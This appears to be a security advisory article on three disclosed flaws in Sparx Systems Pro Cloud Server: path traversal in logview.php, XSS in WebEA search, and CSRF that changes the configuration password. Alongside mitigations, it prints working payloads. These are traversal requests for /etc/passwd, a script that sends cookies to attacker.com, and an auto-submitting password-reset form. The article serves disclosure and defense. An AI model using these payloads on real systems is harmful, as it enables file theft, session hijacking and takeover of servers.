Critical Vulnerabilities in Sparx Systems Pro Cloud Server
Introduction
Sparx Systems Pro Cloud Server is a collaborative modeling platform used by enterprises for managing complex system architectures. Recently, three critical vulnerabilities were disclosed by the National Cyber Security Centre Finland that could compromise the security of organizations using this software. This article provides an in-depth analysis of each vulnerability along with realistic exploitation scenarios.
1. CVE-2025-4377: Path Traversal Vulnerability in logview.php
Technical Analysis:
The vulnerability exists in the logview.php component of Pro Cloud Server's Configuration interface. Due to improper limitation of pathname references (a classic path traversal flaw), attackers can read arbitrary files on the filesystem by manipulating file path parameters.
Affected Versions: All versions prior to the patched release (believed to be fixed in version 6.0.165)
Exploitation Scenario
Step 1: Identifying the vulnerable endpoint An attacker discovers the Pro Cloud Server's configuration interface is exposed at:
https://target-company.com/ProCloudServer/config/logview.phpStep 2: Crafting the malicious request The attacker sends a GET request with directory traversal sequences:
GET /ProCloudServer/config/logview.php?file=../../../../../../etc/passwd HTTP/1.1
Host: target-company.comStep 3: Bypassing potential defenses If basic filters are in place, the attacker might use encoding:
GET /ProCloudServer/config/logview.php?file=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1Impact:
- Disclosure of sensitive system files (passwd, shadow, etc.)
- Access to application configuration files containing credentials
- Potential access to EA model files with proprietary information
Mitigation:
- Upgrade to the latest patched version
- Implement strict input validation for file parameters
- Apply the principle of least privilege to the web server process
2. CVE-2025-4376: Cross-Site Scripting (XSS) in WebEA Model Search
Technical Analysis: The WebEA component's model search functionality fails to properly sanitize user input, allowing stored XSS attacks. This is particularly dangerous as WebEA is designed for collaborative work, meaning malicious scripts would execute in the context of multiple authenticated users.
Affected Versions: All versions earlier than 6.0.165
Exploitation Scenario
Step 1: Identifying the vulnerable search field The attacker finds that search terms in WebEA are reflected without proper output encoding:
https://target-company.com/WebEA/models/search?term=TESTStep 2: Crafting the malicious payload The attacker creates a specially crafted EA model containing JavaScript in searchable fields:
<script>
fetch('https://attacker.com/steal?cookie='+document.cookie);
</script>Alternatively, for reflected XSS:
https://target-company.com/WebEA/models/search?term=<script>alert(document.domain)</script>Step 3: Social engineering The attacker tricks a privileged user into accessing the malicious link or model, potentially through:
- Phishing email with the crafted link
- Comments in shared models referencing the malicious search term
Impact:
- Session hijacking of authenticated users
- Unauthorized actions performed with victim's privileges
- Potential complete compromise of the Pro Cloud Server if admin users are targeted
Mitigation:
- Implement proper output encoding for all user-controllable data
- Add Content Security Policy headers
- Upgrade to the patched version
3. CVE-2025-4375: CSRF Leading to Configuration Password Change
Technical Analysis: The entire Pro Cloud Server application lacks proper CSRF protections, but the most critical manifestation allows attackers to change the server's configuration password. This would give attackers administrative control over the Pro Cloud Server configuration.
Affected Versions: All versions earlier than 6.0.165
Exploitation Scenario
Step 1: Identifying the password change endpoint The attacker profiles the application and finds the password change function at:
POST /ProCloudServer/config/changepassword HTTP/1.1
Host: target-company.com
Content-Type: application/x-www-form-urlencoded
newpass=NEWPASSWORD&confirm=NEWPASSWORDStep 2: Crafting the malicious page The attacker hosts a page containing:
<html>
<body>
<form action="https://target-company.com/ProCloudServer/config/changepassword" method="POST">
<input type="hidden" name="newpass" value="hacked123" />
<input type="hidden" name="confirm" value="hacked123" />
</form>
<script>document.forms[0].submit();</script>
</body>
</html>Step 3: Luring the victim An authenticated administrator visits the attacker's page while logged into Pro Cloud Server. The form automatically submits and changes the password to "hacked123".
Impact:
- Complete compromise of Pro Cloud Server configuration
- Ability to modify server settings, access tokens, and connection strings
- Potential pivot point to internal systems via stored credentials
Mitigation:
- Implement CSRF tokens for all state-changing operations
- Require re-authentication for sensitive actions
- Upgrade to the patched version
Comprehensive Defense Strategy
Immediate Actions:
- Upgrade to Pro Cloud Server version 6.0.165 or later
- Audit logs for signs of exploitation
- Rotate all credentials stored in or used by Pro Cloud Server
Network Controls:
- Restrict access to the configuration interface to specific IP ranges
- Implement WAF rules to detect path traversal and XSS attempts
Long-term Measures:
- Conduct regular security assessments of EA environments
- Implement monitoring for unusual file access patterns
- Train users on recognizing phishing attempts
Conclusion
These vulnerabilities collectively present a critical risk to organizations using vulnerable versions of Sparx Systems Pro Cloud Server. The combination of path traversal, XSS, and CSRF could allow attackers to completely compromise the application and potentially pivot to other systems in the environment. Immediate patching and thorough security reviews are strongly recommended for all affected organizations.